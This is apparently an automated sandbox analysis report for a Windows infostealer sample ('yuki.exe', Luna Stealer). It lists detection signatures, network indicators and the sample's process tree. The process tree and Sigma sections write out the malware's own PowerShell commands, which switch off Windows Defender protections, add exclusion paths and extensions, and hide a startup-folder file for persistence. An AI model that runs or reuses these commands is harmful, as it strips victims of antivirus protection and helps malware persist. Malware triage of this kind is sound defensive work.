Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yuki.exe

Overview

General Information

Sample name:yuki.exe
Analysis ID:1550819
MD5:75f2c40c5fd05b5824d88867c17afb49
SHA1:9e29b9a694b3010def637b18f245ca8635723649
SHA256:1c0d63ed602d3c5b4c7fea32e801ab1b2610f7e9d50c3ccb7ca9550810ea2e0a
Tags:exeuser-JaffaCakes118
Infos:

Detection

Luna Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Luna Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Writes many files with high entropy
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • yuki.exe (PID: 6240 cmdline: "C:\Users\user\Desktop\yuki.exe" MD5: 75F2C40C5FD05B5824D88867C17AFB49)
    • yuki.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\yuki.exe" MD5: 75F2C40C5FD05B5824D88867C17AFB49)
      • cmd.exe (PID: 5852 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3868 cmdline: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2212 cmdline: attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3084 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5444 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1832 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6184 cmdline: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • ? .scr (PID: 648 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S MD5: 75F2C40C5FD05B5824D88867C17AFB49)
    • ? .scr (PID: 4852 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S MD5: 75F2C40C5FD05B5824D88867C17AFB49)
      • cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6020 cmdline: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6508 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4108 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1820 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3716 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5916 cmdline: powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\yuki.exe", ParentImage: C:\Users\user\Desktop\yuki.exe, ParentProcessId: 6532, ParentProcessName: yuki.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", ProcessId: 5852, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\yuki.exe", ParentImage: C:\Users\user\Desktop\yuki.exe, ParentProcessId: 6532, ParentProcessName: yuki.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", ProcessId: 5852, ProcessName: cmd.exe
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\yuki.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\yuki.exe", ParentImage: C:\Users\user\Desktop\yuki.exe, ParentProcessId: 6532, ParentProcessName: yuki.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", ProcessId: 3084, ProcessName: cmd.exe
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\yuki.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\yuki.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\yuki.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 3868, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-07T08:36:19.886155+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449730TCP
2024-11-07T08:36:40.605802+010020229301A Network Trojan was detected20.12.23.50443192.168.2.454135TCP
2024-11-07T08:36:42.599028+010020229301A Network Trojan was detected20.12.23.50443192.168.2.454137TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: yuki.exeAvira: detected
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry-24.6.1.dist-info\LICENSE.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\pycountry-24.6.1.dist-info\LICENSE.txt
Source: yuki.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: yuki.exe, 00000000.00000003.1670466108.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: yuki.exe, 00000000.00000003.1670294212.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: yuki.exe, 00000000.00000003.1670294212.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: yuki.exe, 00000000.00000003.1670466108.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F9280 FindFirstFileExW,FindClose,0_2_00007FF6C81F9280
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6C81F83C0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8211874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6C8211874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571383C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00007FF7571383C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757139280 FindFirstFileExW,FindClose,17_2_00007FF757139280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757151874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00007FF757151874
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:54135
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:54137
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 